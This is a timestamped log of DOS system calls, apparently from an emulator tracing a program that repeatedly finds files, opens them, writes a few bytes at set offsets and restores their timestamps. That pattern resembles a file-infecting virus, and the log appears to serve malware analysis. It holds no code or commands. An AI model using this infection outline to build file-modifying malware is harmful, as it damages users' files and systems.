2018-12-25T11:55:09.479579499Z 64 PC: 12b7e | Write file or device (Write 5 bytes on handle 5)
2018-12-25T11:55:09.487264245Z 87 PC: 12adf | Get or set file date and time
2018-12-25T11:55:09.489326335Z 62 PC: 12ae3 | Close file
2018-12-25T11:55:09.498005902Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:09.501005916Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:09.508745659Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:09.516698477Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:09.518317042Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:09.521815828Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:09.523358405Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:09.526187527Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:09.52832062Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:09.536708707Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:09.539578634Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:09.546928118Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:09.555656692Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:09.557154769Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:09.560054538Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:09.563553008Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:09.566578252Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:09.568357014Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:09.577071989Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:09.580098461Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:09.587310289Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:09.595403553Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:09.596988018Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:09.599957666Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:09.60213403Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:09.605205348Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:09.606921121Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:09.615821149Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:09.619827216Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:09.627084133Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:09.635789307Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:09.637456407Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:09.64063453Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:09.642381455Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:09.645605654Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:09.647376234Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:09.655538185Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:09.658786534Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:09.66600056Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:09.673575422Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:09.675847783Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:09.685149663Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:09.686820016Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:09.694703854Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:09.696596283Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:09.705254033Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:09.708896926Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:09.71608892Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:09.723468827Z 66 PC: 12b5c | Move file pointer (See above)
2018-12-25T11:55:09.725523585Z 64 PC: 12b67 | Write file or device (See above)
2018-12-25T11:55:09.728387903Z 66 PC: 12b73 | Move file pointer (See above)
2018-12-25T11:55:09.729887543Z 64 PC: 12b7e | Write file or device (See above)
2018-12-25T11:55:09.733093626Z 87 PC: 12adf | Get or set file date and time (See above)
2018-12-25T11:55:09.734724155Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:09.742743408Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:09.746253307Z 61 PC: 12afd | Open file (See above)
2018-12-25T11:55:09.754625563Z 63 PC: 12b21 | Read file or device (See above)
2018-12-25T11:55:09.757790199Z 62 PC: 12ae3 | Close file (See above)
2018-12-25T11:55:09.761044647Z 79 PC: 12abd | Find next file (See above)
2018-12-25T11:55:09.763663716Z 26 PC: 12ac6 | Set disk transfer address